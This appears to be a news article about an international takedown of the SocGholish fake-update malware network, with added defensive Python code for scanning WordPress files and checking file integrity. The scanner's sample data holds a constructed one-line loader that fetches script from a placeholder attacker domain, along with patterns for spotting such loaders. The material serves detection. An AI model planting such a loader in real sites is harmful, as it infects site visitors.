Dutch law enforcement authorities, operating alongside counterparts from Canada, Germany, and the United States, have executed a major takedown against SocGholish — one of the most prolific initial access broker networks in the cybercrime ecosystem. The operation, conducted under the banner of Operation Endgame, resulted in the disruption of command-and-control servers and the remediation of nearly 15,000 infected WordPress websites.
What Is SocGholish?
SocGholish (also tracked as FakeUpdates) is a JavaScript-based malware framework that has been active since at least 2017. The campaign operates by injecting malicious JavaScript into legitimate websites — primarily WordPress installations — that presents visitors with fake browser or software update prompts.
When a victim clicks the fake update notification, the browser downloads a ZIP archive containing a malicious JavaScript file that, once executed, establishes an initial foothold on the victim's machine. SocGholish then serves as an initial access broker, selling or transferring that access to secondary threat actors, including ransomware operators, espionage groups, and data theft crews.
The network is closely associated with the Evil Corp cybercrime group, which has been sanctioned by US authorities.
Scale of Operation Endgame
The operation yielded significant results across multiple fronts:
- 14,971 WordPress websites cleaned of SocGholish injection scripts
- Multiple command-and-control servers seized or taken offline
- Infrastructure used to redirect victims to malware delivery pages disrupted
- Coordination with web hosting providers to prevent reinfection of cleaned sites
Dutch authorities stated: "With these actions we deprive cybercriminals of access to infected computers and the networks they use to expand their operations."
How WordPress Sites Were Compromised
SocGholish's infection of WordPress sites typically followed a consistent pattern:
- Vulnerability exploitation — attackers scanned for and exploited known WordPress plugin and theme vulnerabilities, particularly in popular plugins with unpatched security flaws
- Credential stuffing — compromised admin credentials from previous breaches were used to authenticate directly to wp-admin
- Malicious script injection — once admin access was obtained, attackers modified legitimate JavaScript files or injected new script tags that loaded the SocGholish payload from attacker-controlled domains
- Traffic redirection — injected scripts used fingerprinting logic to only display fake update prompts to specific victim profiles, avoiding detection by site owners and security crawlers
The selective display of malicious content — targeting only certain browser types, geographies, or user behaviors — made automated detection of SocGholish infections significantly more challenging.
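Because the injected scripts only show the fake prompt to selected visitors, crawling the rendered site often sees nothing; the reliable place to look is the files on disk. The following scanner is an added example written for this article, not code from the investigation or from any WordPress project. It checks markup files for script tags that load from hosts outside an allowlist, and checks JavaScript bodies (inline or whole .js files, where modified core and theme scripts would appear) for the loader shape described above: dynamic script element creation pointing at an outside host. The allowlist, the sample file tree and the domains in it are constructed placeholders.

```python
import re
from urllib.parse import urlparse

# Hosts allowed to serve scripts to this site. Constructed for this example;
# a real deployment lists the site's own domain, its CDN and vetted third parties.
ALLOWED_SCRIPT_HOSTS = {"www.example-site.test", "cdn.example-site.test"}

SCRIPT_SRC_RE = re.compile(
    r"<script\b[^>]*\bsrc\s*=\s*[\"']([^\"']+)[\"']", re.IGNORECASE)
INLINE_SCRIPT_RE = re.compile(
    r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
URL_IN_STRING_RE = re.compile(
    r"[\"'](?:https?:)?//([a-z0-9.-]+)[^\"']*[\"']", re.IGNORECASE)
# Heuristic hints of an injected loader: dynamic <script> creation plus the
# decoding helpers injected code commonly relies on. Hints, not signatures.
LOADER_HINTS = [
    ("dynamic-script-element",
     re.compile(r"createElement\s*\(\s*[\"']script[\"']", re.IGNORECASE)),
    ("base64-decode", re.compile(r"\batob\s*\(")),
    ("charcode-decode", re.compile(r"String\.fromCharCode")),
    ("eval", re.compile(r"\beval\s*\(")),
]


def _host_of(url):
    """Return the hostname of an absolute or protocol-relative URL, else None."""
    if url.startswith("//"):
        url = "https:" + url
    return urlparse(url).hostname


def scan_content(path, content):
    """Scan one file's text and return a list of finding dicts."""
    findings = []
    if path.endswith((".php", ".html", ".htm")):
        # Markup: check every <script src=...> against the allowlist ...
        for m in SCRIPT_SRC_RE.finditer(content):
            host = _host_of(m.group(1))
            if host and host not in ALLOWED_SCRIPT_HOSTS:
                findings.append({"path": path, "kind": "external-script-src",
                                 "hosts": {host}, "hints": []})
        # ... and collect inline script bodies for the loader heuristics.
        bodies = [m.group(1) for m in INLINE_SCRIPT_RE.finditer(content)]
    else:
        # Plain .js file (e.g. a modified core or theme script): the whole file is script.
        bodies = [content]
    for body in bodies:
        hints = [name for name, rx in LOADER_HINTS if rx.search(body)]
        hosts = {h.lower() for h in URL_IN_STRING_RE.findall(body)} - ALLOWED_SCRIPT_HOSTS
        # Flag a body that builds a script element, or stacks several decoding
        # helpers, while referencing a host outside the allowlist.
        if hosts and ("dynamic-script-element" in hints or len(hints) >= 2):
            findings.append({"path": path, "kind": "inline-loader",
                             "hosts": hosts, "hints": hints})
    return findings


def scan_files(files):
    """files: {relative_path: text}. Returns all findings across the tree."""
    findings = []
    for path, content in files.items():
        findings.extend(scan_content(path, content))
    return findings


# Constructed sample tree: one injected <script> tag in the theme footer and a
# loader appended to a legitimate core script. All domains are placeholders.
SAMPLE_FILES = {
    "wp-content/themes/site/footer.php": (
        '<script src="/wp-includes/js/jquery/jquery.min.js"></script>\n'
        '<script src="https://cdn.example-site.test/app.js"></script>\n'
        '<script src="https://injected.attacker-controlled.example/update.js"></script>\n'
    ),
    "wp-content/themes/site/js/main.js":
        "document.addEventListener('DOMContentLoaded', function () {});\n",
    "wp-includes/js/jquery/jquery-migrate.min.js": (
        "/*! jQuery Migrate - legitimate content would be here */\n"
        "(function(){var s=document.createElement('script');"
        "s.src='https://injected.attacker-controlled.example/loader.js';"
        "document.head.appendChild(s);})();\n"
    ),
}

if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f['path']}: {f['kind']} hosts={sorted(f['hosts'])} hints={f['hints']}")
```

Run against a real install by reading each .php and .js file under the web root into the mapping that scan_files expects. A hit on an unknown host is a lead to investigate, not proof of compromise: some plugins legitimately load scripts from their vendor, so the first pass usually turns into tuning the allowlist before the remaining hits are worth a closer look.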
Significance for the Cybercrime Ecosystem
SocGholish represents a critical node in the cybercrime supply chain. As an initial access broker network, it has been linked to:
- Pre-ransomware intrusions by multiple ransomware groups
- WastedLocker and other Evil Corp ransomware variants
- Data exfiltration operations targeting financial and healthcare organizations
- Lateral movement into enterprise networks via compromised employee endpoints
By dismantling the infrastructure that fed these downstream attacks, Operation Endgame effectively cuts off a supply line used by multiple threat actors simultaneously — a force multiplier effect in law enforcement terms.
International Coordination
Operation Endgame has been an ongoing multi-phase effort that began with earlier disruptions of botnets and infrastructure in 2024 and 2025. The SocGholish phase represents a continuation of that coordinated strategy, demonstrating that international law enforcement operations against cybercrime infrastructure have become more systematic and sustained.
Participating agencies included:
- Netherlands National Police (lead)
- Royal Canadian Mounted Police (RCMP)
- German Federal Criminal Police Office (BKA)
- US Federal Bureau of Investigation (FBI)
- US Cybersecurity and Infrastructure Security Agency (CISA)
Recommendations for WordPress Site Owners
WordPress site administrators should take the following steps regardless of whether they believe their site was affected:
- Audit installed plugins and themes — remove unused plugins and update all active ones to current versions
- Review file integrity — use tools like WP Integrity Checker or Sucuri SiteCheck to identify modified JavaScript files
- Audit admin accounts — review and remove any unauthorized administrator accounts
- Enable two-factor authentication on all admin accounts
- Check outbound network requests in server logs for connections to unfamiliar domains
- Deploy a Web Application Firewall (WAF) to block known SocGholish injection patterns
- Monitor for content changes using file change detection tools
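The file integrity and change monitoring items above come down to one mechanism: hash every file from a known-clean state, store that manifest away from the web server, and diff a fresh manifest against it on a schedule. The code below is an added example for this article, not a tool named on the page, and its sample trees, paths and file contents are constructed. It also lists the two diff results that deserve the first look given how these infections land: modified JavaScript and new PHP files under the uploads directory.

```python
import hashlib
import os

# File types worth tracking on a WordPress install. Constructed choice for the
# example; a real baseline would also cover wp-config.php and .htaccess.
TRACKED_EXTENSIONS = (".php", ".js", ".html", ".htaccess")


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def build_manifest(files):
    """Hash an in-memory {path: bytes} mapping into {path: sha256}."""
    return {path: sha256_hex(data) for path, data in files.items()}


def build_manifest_from_dir(root):
    """Walk a real install on disk and hash every tracked file (paths relative to root)."""
    manifest = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.endswith(TRACKED_EXTENSIONS):
                full = os.path.join(dirpath, name)
                with open(full, "rb") as fh:
                    manifest[os.path.relpath(full, root)] = sha256_hex(fh.read())
    return manifest


def diff_manifests(baseline, current):
    """Compare a known-good baseline against a fresh manifest."""
    common = baseline.keys() & current.keys()
    return {
        "added": sorted(current.keys() - baseline.keys()),
        "removed": sorted(baseline.keys() - current.keys()),
        "modified": sorted(p for p in common if baseline[p] != current[p]),
    }


def review_points(diff):
    """Pick out the diff entries to inspect first: PHP files appearing under the
    writable uploads tree, and any JavaScript whose hash changed."""
    points = []
    for p in diff["added"]:
        if p.startswith("wp-content/uploads/") and p.endswith(".php"):
            points.append(("php-in-uploads", p))
    for p in diff["modified"]:
        if p.endswith(".js"):
            points.append(("modified-js", p))
    return points


# Constructed sample: a clean tree captured after an update, and the same tree
# later with a loader appended to a core script and a stray PHP file in uploads.
CLEAN_TREE = {
    "wp-includes/js/jquery/jquery-migrate.min.js": b"/* legitimate jquery migrate */\n",
    "wp-content/themes/site/footer.php": b"<?php wp_footer(); ?>\n",
    "wp-content/plugins/seo/seo.php": b"<?php // plugin code\n",
}
LATER_TREE = dict(CLEAN_TREE)
LATER_TREE["wp-includes/js/jquery/jquery-migrate.min.js"] += b"(function(){/* appended loader */})();\n"
LATER_TREE["wp-content/uploads/2024/cache.php"] = b"<?php // unexpected file\n"

if __name__ == "__main__":
    diff = diff_manifests(build_manifest(CLEAN_TREE), build_manifest(LATER_TREE))
    for key in ("added", "removed", "modified"):
        print(key, diff[key])
    for reason, path in review_points(diff):
        print("REVIEW", reason, path)
```

Capture the baseline only from a state you trust (a fresh install, or immediately after updating core, plugins and themes) and keep it somewhere an attacker with wp-admin access cannot rewrite, otherwise a compromise simply becomes the new baseline. For the core files specifically, WP-CLI's wp core verify-checksums compares the install against the checksums WordPress.org publishes, which removes the need to trust a locally captured baseline for that part of the tree.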
Site owners who suspect their WordPress installation may have been part of the SocGholish network should contact their hosting provider and review guidance from CISA and the Dutch National Police.